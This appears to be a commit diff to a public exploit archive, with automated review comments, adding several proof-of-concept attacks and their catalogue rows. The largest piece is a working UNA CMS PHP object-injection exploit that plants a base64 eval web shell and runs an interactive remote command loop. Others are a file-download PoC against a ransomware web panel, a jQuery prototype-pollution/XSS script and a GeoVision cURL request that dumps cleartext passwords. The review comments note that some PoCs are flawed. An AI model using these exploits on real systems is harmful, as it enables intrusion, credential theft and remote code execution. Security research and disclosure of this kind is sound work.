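Review bot: `login()` calls `self.upload(session)` unconditionally, so after printing "Unable to login!" the script still proceeds to the upload step, where `nsp[0]` on an empty `re.findall` result raises an unhandled IndexError; return after the failure branch and check that each regex matched before indexing. Smaller points: the `-u` help text reads `Example: -a username` (should be `-u`), and the parser description spells the identifier `CVE-201915949` while the header and banner use `CVE-2019-15949`. `urllib3.disable_warnings()` is also called unconditionally, so certificate warnings are suppressed even when `-k` was not passed; keep them unless the user opted out. For log review on a 5.6.6 install, the script's own paths give the sequence to look for: an authenticated POST to `admin/monitoringplugins.php` with a multipart field named `uploadedfile`, followed by a GET to `includes/components/profile/profile.php?cmd=download`.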


@ -0,0 +1,125 @@
# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
# Author: Egidio Romano aka EgiX
# Software link.......: https://unacms.com
[-] Software Links:
https://unacms.com
https://github.com/unacms/una
[-] Affected Versions:
All versions from 9.0.0-RC1 to 14.0.0-RC4.
[-] Vulnerability Description:
The vulnerability is located in the
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is
not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by remote,
unauthenticated attackers to inject arbitrary PHP objects into the
application scope, allowing them to perform a variety of attacks, such
as writing and executing arbitrary PHP code.
<?php
/*
------------------------------------------------------------------------------------
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
------------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://unacms.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is not properly
sanitized before being used in a call to the unserialize() PHP function. This can be
exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
the application scope, allowing them to perform a variety of attacks, such as
writing and executing arbitrary PHP code.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-01
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/una/";
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
die();
}
define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
class GuzzleHttp_Cookie_SetCookie
{
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}
class GuzzleHttp_Cookie_FileCookieJar
{
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
function __construct()
{
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
}
}
$url = $argv[1];
$ch = curl_init();
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
print "\n[+] Performing PHP Object Injection";
curl_exec($ch); curl_close($ch);
print "\n[+] Launching shell\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
while(1)
{
print "\nuna-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
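Review bot: the vulnerability description is duplicated verbatim in this hunk, once as plain text above `<?php` (the `[-] Vulnerability Description:` block) and again inside the header comment, and the software link is likewise given twice (`# Software link.......:` and `software link.......:`); keep one copy of each. The header also lacks a fixed-version line: it states `All versions from 9.0.0-RC1 to 14.0.0-RC4` as affected and links KIS-2025-01, but nothing tells a reader which release to upgrade to, nor that the remediation is to stop feeding the `profile_id` POST parameter to `unserialize()` (an integer identifier should be cast with `(int)` and validated before use). Finally, `CURLOPT_SSL_VERIFYPEER` and `CURLOPT_SSL_VERIFYHOST` are hard-coded to 0; make disabling verification an explicit option.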


@ -0,0 +1,71 @@
# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
# Google Dork: N/A
# Date: 22-03-2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: MacOS local xampp
Authentication can be easily bypassed due to SQL Injection as mentioned in:
https://www.exploit-db.com/exploits/52091
Vulnerable file:Web Panel/download_file.php
Vulnerable parameter:file
Vulnerable code:
<?php
session_start();
if(!isset($_SESSION['username']) ){
header("Location: login.php");
}
$file=$_GET['file'];
if(!empty($file)){
// Define headers
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=$file");
header("Content-Type: text/encoded");
header("Content-Transfer-Encoding: binary");
// Read the file
readfile($file);
exit;
}else{
echo 'The file does not exist.';
}
?>
Proof of concept:
http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
GET: HTTP/1.1 200 OK
Date: Sat, 22 Mar 2025 09:42:09 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Description: File Transfer
Content-Disposition: attachment; filename=database/db_conection.php
Content-Transfer-Encoding: binary
Content-Length: 95
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/encoded;charset=UTF-8
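Review bot: the session check in the quoted vulnerable code (`if(!isset($_SESSION['username']) ){ header("Location: login.php"); }`) emits a redirect but never calls `exit`, so execution continues into `readfile($file)`; the advisory should say whether the "(Authenticated)" qualifier in the title was actually verified, and its remediation guidance should cover both `exit;` after the redirect and constraining `$file` to an allow-listed directory (`basename()` plus a `realpath()` prefix check) before `readfile()`, since the raw `file` parameter is currently passed straight through. Two formatting points in the PoC: the request is shown without a request line (the URL sits bare above `Host:`; it should read `GET /Jasmin-Ransomware/Web%20Panel/download_file.php?file=database/db_conection.php HTTP/1.1`), and the response status line is written `GET: HTTP/1.1 200 OK` where `HTTP/1.1 200 OK` is meant. The `Cookie: PHPSESSID=...` value should be redacted before publication.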


@ -0,0 +1,72 @@
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps
# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.
# PoC (Proof of Concept):
# ------------------------------------
/*
* Exploit for CVE-2020-7656 and CVE-2019-11358
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
*/
COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);
// 2. Function to execute after jQuery is loaded
script.onload = function() {
console.log("[+] Vulnerable jQuery loaded!");
// 3. Inject malicious content for XSS (CVE-2020-7656)
const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
$('body').append(maliciousContent);
console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
// 4. Exploit Prototype Pollution (CVE-2019-11358)
const defaultConfig = {
"backLink": "<a href='https://example.com'>Go Back</a>"
};
const maliciousParams = {
"__proto__": {
"backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
}
};
// 5. Merge objects using vulnerable $.extend
let config = $.extend(true, defaultConfig, maliciousParams);
console.log("[+] Prototype Pollution executed via $.extend().");
// 6. Create a container to inject malicious content
const container = document.createElement('div');
container.id = 'backLinkContainer';
document.body.appendChild(container);
// 7. Inject malicious content into the DOM
$('#backLinkContainer').html(config.backLink);
console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};
// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");
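Review bot: the prototype-pollution demonstration in this hunk does not prove what it claims. After `let config = $.extend(true, defaultConfig, maliciousParams);` the script reads `config.backLink`, but `defaultConfig` already owns a `backLink` property, so the lookup returns the original anchor tag and never touches anything written to `Object.prototype`; verify the condition directly instead, e.g. log `Object.prototype.hasOwnProperty('backLink')` or read `backLink` from a fresh `{}` after the merge. The first alert is likewise not evidence of a library flaw: `$('body').append("<script>...")` evaluates inline scripts in every jQuery version by design, so it only shows that attacker-controlled HTML reaches jQuery. Related to that, NVD records CVE-2020-7656 (the `</script >` whitespace case) against jQuery releases before 1.9.0, so the header should cite why 3.3.1 is in scope for that id or drop it; for CVE-2019-11358 the `<3.4.X` boundary should be stated as the fixed release 3.4.0. Finally, the line `COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)` is bare text inside the script, so the file does not parse as JavaScript; make it a `//` comment.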


@ -0,0 +1,46 @@
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902
Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
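Review bot: the cURL script hard-codes `-H $'Origin: https://192.168.50.129'` (a lab address) while `Host:` and the URL use the `[SET-TARGET]` placeholder; template the Origin header the same way or drop it, otherwise the request's `Sec-Fetch-Site: same-origin` is inconsistent with the target. The write-up also names no fixed version: `# Version: 6.1.0.0 or less` gives the affected range, so a header line pointing at the vendor fix (or stating that none was available at publication) is missing. Minor wording in the Requirements list: `there are cases when there are public access` should read `in some cases the application is exposed publicly`.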


@ -11031,6 +11031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47780/info
39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,,2016-02-18,2016-02-18,0,CVE-2015-2080,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,,2019-02-11,2019-02-12,0,CVE-2019-6545;CVE-2019-6543,,,,,
52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
@ -11486,6 +11487,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple,,2002-05-17,2012-09-22,1,CVE-2002-2341;OSVDB-4408,,,,,https://www.securityfocus.com/bid/4755/info
52143,exploits/multiple/remote/52143.py,"Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)",2025-04-08,lkushinada,remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-23922,,,,,
22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple,,2012-11-05,2012-11-05,1,OSVDB-87063;OSVDB-87062;OSVDB-87061;OSVDB-87060;OSVDB-87059;OSVDB-87058;OSVDB-87057;OSVDB-87056,,,,,
48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,,2020-06-15,2020-06-15,0,CVE-2020-12712,,,,,
50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",2022-06-14,Altelus,remote,multiple,,2022-06-14,2022-06-14,0,CVE-2022-23642,,,,,
@ -11926,6 +11928,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
@ -11997,6 +12000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
52140,exploits/multiple/webapps/52140.txt,"Jasmin Ransomware - Arbitrary File Download (Authenticated)",2025-04-08,bRpsd,webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
@ -12018,6 +12022,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,,2020-03-02,2020-03-02,0,CVE-2020-9038,,,,,
49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11023,,,,,
49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11022,,,,,
52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",2025-04-08,xOryus,webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2020-7656;CVE-2019-11358,,,,,
11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple,,2010-01-20,,1,,,,,http://www.exploit-db.comjquery.uploadify-v2.1.0.zip,
38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2014-6593;OSVDB-117238,,,,,
38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple,,2015-10-11,2015-10-11,0,CVE-2015-5285,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
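Review bot: the new row `52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",...` carries the word "Exploit" in the description, which no neighbouring row does (compare `"jQuery 1.2 - Cross-Site Scripting (XSS)"`); drop it. The file is also a JavaScript PoC stored under a `.txt` path; `.js` would match how the catalogue names the other script entries (`.py`, `.rb`, `.java` above).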
@ -12112,6 +12117,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
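Review bot: the new row `52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",...` writes the product as `Nagios Xi`, whereas the adjacent row uses `Nagios XI` (`"Nagios XI Version 2024R1.01 - SQL Injection"`); use `Nagios XI` so sorting and search stay consistent. The entry's body in this commit is a Python script (it ends in an `if __name__ == "__main__":` argparse block), yet the path is `52138.txt`; `.py` would match the other Python entries in this file.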
@ -12359,6 +12365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
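Review bot: the new row `52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",...` truncates the version: the exploit header in this commit reads `UNA CMS <= 14.0.0-RC4`, so the description should say `14.0.0-RC4`. The row also leaves the trailing source-URL column empty although the advisory cites https://karmainsecurity.com/KIS-2025-01; other rows (e.g. the `43362` vBulletin entry) carry the original advisory link there.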
@ -12414,6 +12421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2016-1209;OSVDB-8485,,,,,https://github.com/rapid7/metasploit-framework/blob/8cd9a9b6708c4a175d5175879169188dc8014a51/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php